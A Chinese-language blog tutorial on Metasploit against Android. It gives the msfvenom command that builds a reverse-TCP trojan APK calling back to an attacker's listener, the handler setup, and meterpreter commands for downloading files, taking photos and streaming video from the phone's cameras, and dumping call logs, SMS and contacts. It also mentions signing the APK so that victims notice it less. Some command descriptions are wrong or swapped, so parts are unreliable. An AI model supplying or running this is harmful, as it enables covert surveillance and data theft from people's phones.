Metasploit之渗透安卓实战

 
 

Metasploit之渗透安卓实战

 在之前的Metaspoloit使用中都是在Windows系统中,因为渗透的是Windows系统,所以选用了“windows/meterpreter/reverse_tcp”模块。
而这里需要渗透安卓系统了,就选用“android/meterpreter/reverse_tcp”模块。
那么对于kali-linux连接木马的方式还是和之前的一样,利用“exploit/multi/handler”
并且,同样需要选用“windows/meterpreter/reverse_tcp”的PAYLOAD
这里假设我的测试环境
kali-linux: 192.168.2.146
安卓模拟环境:192.168.2.107

 

一、生成远程安卓木马
msfconsole
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.2.146 LPORT=4444 R > payload.apk

命令解析:
p 设置要使用的payload
LHOST 设置用来接收反弹连接的主机(kali-linux的IP)
LPORT 设置用来接收反弹连接的端口(kali-linux的端口)
R 设置文件格式
Location 要保存的文件位置–>/root/Desktop/是桌面,没有目录表示当前系统Home目录下
PS:对于目前的安卓系统安全机制的考虑,因为没有签名证书可能导致无法安装或易被受害者识破
那么,签名证书的制作可以查看参考文献资料

 

二、开启metasploit,并且开启相关连接
msfconsole
use exploit/multi/handler
set PAYLOAD android/meterpreter/reverse_tcp
set LHOST 192.168.2.146
set LPORT 4444
exploit

 

三、meterpreter连接
 安卓手机安装并且打开木马后会返回我们一个meterpreter连接,那么我们可以使用以下的一些常用的命令:
cd –>目录切换,命令:cd / 切换到根目录
search –>搜索文件,命令:search text.jpg
download –>下载文件,命令:download test.jpg
webcam_list –>查看摄像头列表,因为手机都是前置和后置摄像头了
webcam_snap –>拍照一张,需要选用前置或者后置摄像头,命令:webcam_snap -i 1
webcam_stream –>开启摄像头视频监控,同上,命令:webcam_stream -i 1

安卓系统相关命令:
check_root –>查看当前安卓是否已经root
dump_calllog –>下载通话记录
dump_contacts –>下载短信记录
dump_sms –>下载通讯录
geolocate –>利用谷歌地图定位(需要安装谷歌地图)

 
 
 
 


  Reprint please specify: Treecatee Metasploit之渗透安卓实战

 Previous
薛之谦-《怪咖》专辑 薛之谦-《怪咖》专辑
作曲 : 薛之谦作词 : 薛之谦你的改变 很难制止了我的取悦 也不是天生的熟练了 喜怒就合并了你的理由是星星点点的我尽量充当气氛营造者练就成了 无痛的角色再听多几次分开的话越致命越不正面回答感情里的怪咖 有铺垫就不尴尬所以要找个延期方法
2018-11-17
Next 
Metasploit工具Meterpreter的命令速查表 Metasploit工具Meterpreter的命令速查表
   msfpayload反弹shell使用的一些命令集  一、核心命令 – 帮助菜单 background – 将当前会话移动到背景变成一个session,当再次使用时再用sessions -i ID调用b
2018-11-17
  TOC